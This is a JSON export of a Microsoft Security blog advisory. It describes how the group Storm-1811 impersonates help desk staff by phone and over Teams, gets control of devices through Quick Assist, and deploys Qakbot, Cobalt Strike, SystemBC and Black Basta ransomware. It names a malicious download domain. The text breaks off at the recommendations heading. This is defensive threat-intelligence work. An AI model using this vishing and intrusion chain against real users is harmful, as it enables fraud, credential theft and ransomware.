{"id":134322,"date":"2024-05-15T09:00:00","date_gmt":"2024-05-15T16:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=134322"},"modified":"2024-06-05T14:00:02","modified_gmt":"2024-06-05T21:00:02","slug":"threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/05\/15\/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware\/","title":{"rendered":"Threat actors misusing Quick Assist in social engineering attacks leading to ransomware"},"content":{"rendered":"\n
\n

June 2024 update<\/strong>: At the end of May 2024, Microsoft Threat Intelligence observed Storm-1811 using Microsoft Teams as another vector to contact target users. Microsoft assesses that the threat actor uses Teams to send messages and initiate calls in an attempt to impersonate IT or help desk personnel. This activity leads to Quick Assist misuse, followed by credential theft using EvilProxy, execution of batch scripts, and use of SystemBC for persistence and command and control.<\/p>\n<\/blockquote>\n\n\n\n

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist<\/a> to target users in social engineering attacks. Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware. The observed activity begins with impersonation through voice phishing (vishing<\/a>), followed by delivery of malicious tools, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware like Qakbot, Cobalt Strike, and ultimately Black Basta ransomware.<\/p>\n\n\n

\n\t
\n\t\t

\n\t\t\tMITIGATE THIS THREAT \t\t<\/p>\n\t\t\n\t\t\tGet recommendations<\/span> <\/span>\n\t\t<\/a>\n\t<\/div>\n<\/div>\n\n\n\n

Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting. Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user\u2019s company to gain initial access to a target device.<\/p>\n\n\n

\n\t
\n\t\t

\n\t\t\tRANSOMWARE AS A SERVICE\t\t<\/p>\n\t\t\n\t\t\tProtect users and orgs<\/span> <\/span>\n\t\t<\/a>\n\t<\/div>\n<\/div>\n\n\n\n

In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams. Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.<\/p>\n\n\n

\n\t
\n\t\t

\n\t\t\tTECH SUPPORT SCAMS\t\t<\/p>\n\t\t\n\t\t\tReport scam<\/span> <\/span>\n\t\t<\/a>\n\t<\/div>\n<\/div>\n\n\n\n

Organizations can also reduce the risk of attacks by blocking or uninstalling<\/a> Quick Assist and other remote management tools if the tools are not in use in their environment. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams<\/a> are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services. Educating users on how to recognize such scams can significantly reduce the impact of social engineering attacks<\/a>. <\/p>\n\n\n\n

Social engineering<\/h2>\n\n\n\n

One of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks. Vishing attacks are a form of social engineering that involves callers luring targets into revealing sensitive information under false pretenses or tricking targets into carrying out actions on behalf of the caller.<\/p>\n\n\n\n

For example, threat actors might attempt to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device. In other cases, threat actors initiate link listing attacks \u2013 a type of email bombing attack<\/a>, where threat actors sign up targeted emails to multiple email subscription services to flood email addresses indirectly with subscribed content. Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue.<\/p>\n\n\n\n

At the end of May 2024, Microsoft observed Storm-1811 using Microsoft Teams to send messages to and call target users. Tenants created by the threat actor are used to impersonate help desk personnel with names displayed as \u201cHelp Desk\u201d, \u201cHelp Desk IT\u201d, \u201cHelp Desk Support\u201d, and \u201cIT Support\u201d. Microsoft has taken action to mitigate this by suspending identified accounts and tenants associated with inauthentic behavior. Apply security best practices for Microsoft Teams<\/a> to safeguard Teams users.<\/p>\n\n\n\n

During the call, the threat actor persuades the user to grant them access to their device through Quick Assist. The target user only needs to press CTRL + Windows + Q and enter the security code provided by the threat actor, as shown in the figure below.<\/p>\n\n\n

\"Screenshot
Figure 1. Quick Assist prompt to enter security code<\/em><\/figcaption><\/figure>\n\n\n\n

After the target enters the security code, they receive a dialog box asking for permission to allow screen sharing. Selecting Allow<\/em> shares the user\u2019s screen with the actor.<\/p>\n\n\n

\"Screenshot
Figure 2. Quick Assist dialog box asking permission to allow screen sharing<\/em><\/figcaption><\/figure>\n\n\n\n

Once in the session, the threat actor can select Request Control<\/em>, which if approved by the target, grants the actor full control of the target\u2019s device.<\/em><\/p>\n\n\n

\"Screenshot
Figure 3. Quick Assist dialog box asking permission to allow control<\/em><\/figcaption><\/figure>\n\n\n\n

Follow-on activity leading to Black Basta ransomware<\/h2>\n\n\n\n

Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads. Some of the batch scripts observed reference installing fake spam filter updates requiring the targets to provide sign-in credentials. In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike.<\/p>\n\n\n

\"Screenshot
Figure 4. Examples of cURL commands to download batch files and ZIP files<\/em><\/figcaption><\/figure>\n\n\n\n

Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811.<\/p>\n\n\n\n

ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.<\/p>\n\n\n\n

The mentioned RMM tools are commonly used by threat actors because of their extensive capabilities and ability to blend in with the environment. In some cases, the actors leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. <\/p>\n\n\n\n

After the threat actor installs the initial tooling and the phone call is concluded, Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. <\/p>\n\n\n\n

In cases where Storm-1811 relies on Teams messages followed by phone calls and remote access through Quick Assist, the threat actor uses BITSAdmin<\/a> to download batch files and ZIP files from a malicious site, for example antispam3[.]com<\/em>. Storm-1811 also provides the target user with malicious links that redirect the user to an EvilProxy phishing site to input credentials. EvilProxy<\/a> is an adversary-in-the-middle (AiTM) phishing kit used to capture passwords, hijack a user\u2019s sign-in session, and skip the authentication process. Storm-1811 was also observed deploying SystemBC<\/a>, a post-compromise commodity remote access trojan (RAT) and proxy tool typically used to establish command-and-control communication, establish persistence in a compromised environment, and deploy follow-on malware, notably ransomware.<\/p>\n\n\n\n

In several cases, Storm-1811 uses PsExec to deploy Black Basta ransomware throughout the network. Black Basta is a closed ransomware offering (exclusive and not openly marketed like ransomware as a service) distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development. Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from Qakbot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat. In the next sections, we share recommendations for improving defenses against this threat, including best practices when using Quick Assist and mitigations for reducing the impact of Black Basta and other ransomware.<\/p>\n\n\n\n

Recommendations<\/h2>\n\n\n\n

Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:<\/p>\n\n\n\n